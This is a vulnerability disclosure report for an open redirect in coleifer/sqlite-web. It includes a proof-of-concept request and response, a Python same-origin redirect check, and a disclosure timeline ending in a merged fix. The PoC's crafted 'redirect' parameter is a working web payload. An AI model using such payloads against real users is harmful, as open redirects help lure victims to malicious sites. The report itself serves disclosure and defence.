Open Redirection in coleifer/sqlite-web

Valid

Reported on

Mar 26th 2022


Description

An open redirect security flaw allows an attacker to redirect the victims of the application to malicious sites.

Proof of Concept

Request 

POST /create-table/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/
Cookie: session=
Upgrade-Insecure-Requests: 1

redirect=http://google.com&table_name=

Response

HTTP/1.0 302 FOUND
Content-Type: text/html; charset=utf-8
Content-Length: 240
Location: http://google.com
Server: Werkzeug/2.0.2 Python/3.9.9
Date: Sat, 26 Mar 2022 11:45:25 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="http://google.com">http://google.com</a>. If not click the link.

Impact

Redirect to unsafe pages
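
A server-side check that would reject the `redirect` value from the request above, shown as an added example; it is not sqlite-web's code and not the merged fix. The function names `resolve_same_origin` and `redirect_location` are hypothetical, and the check assumes the application only ever needs to redirect within its own origin.

```python
from urllib.parse import urljoin, urlsplit


def resolve_same_origin(target, host_url):
    """Return target as an absolute URL if it stays on host_url's origin, else None."""
    if not target:
        return None
    # Browsers treat "\" like "/" and drop control characters and whitespace
    # while parsing, so reject such input instead of trying to normalise it.
    if "\\" in target or any(ord(ch) <= 0x20 or ord(ch) == 0x7F for ch in target):
        return None
    base = urlsplit(host_url)
    # Resolve relative and scheme-relative ("//host") forms before comparing.
    resolved = urljoin(host_url, target)
    parts = urlsplit(resolved)
    if parts.scheme not in ("http", "https"):
        return None
    # Compare scheme and netloc (userinfo, host and port) exactly.
    if (parts.scheme, parts.netloc) != (base.scheme, base.netloc):
        return None
    return resolved


def redirect_location(form, host_url, fallback="/"):
    """Pick the Location value for a handler that honours a 'redirect' form field."""
    safe = resolve_same_origin(form.get("redirect"), host_url)
    return safe or urljoin(host_url, fallback)


if __name__ == "__main__":
    host = "http://127.0.0.1:8080/"
    # Form body taken from the proof-of-concept request in this report.
    poc_form = {"redirect": "http://google.com", "table_name": ""}
    print(redirect_location(poc_form, host))
    # Constructed same-origin value for comparison.
    print(redirect_location({"redirect": "/my_table/"}, host))
```

In a Flask handler, `host_url` would typically come from `request.host_url`, and the returned string is what gets passed to `redirect()`.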

We are processing your report and will contact the coleifer/sqlite-web team within 24 hours. 2 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
We have contacted a member of the coleifer/sqlite-web team and are waiting to hear back 2 months ago
We have sent a follow up to the coleifer/sqlite-web team. We will try again in 7 days. 2 months ago
Jamie Slome modified the report
2 months ago
Jamie Slome
2 months ago

Admin


The maintainer has indicated that this does not have any security implications and so the severity has been assigned None.

I will approve and confirm the fix in any case, as this report was technically addressed with a patch.

Jamie Slome validated this vulnerability 2 months ago
0xdhinu has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome confirmed that a fix has been merged on ce8214 2 months ago
The fix bounty has been dropped
sqlite_web.py#L222 has been validated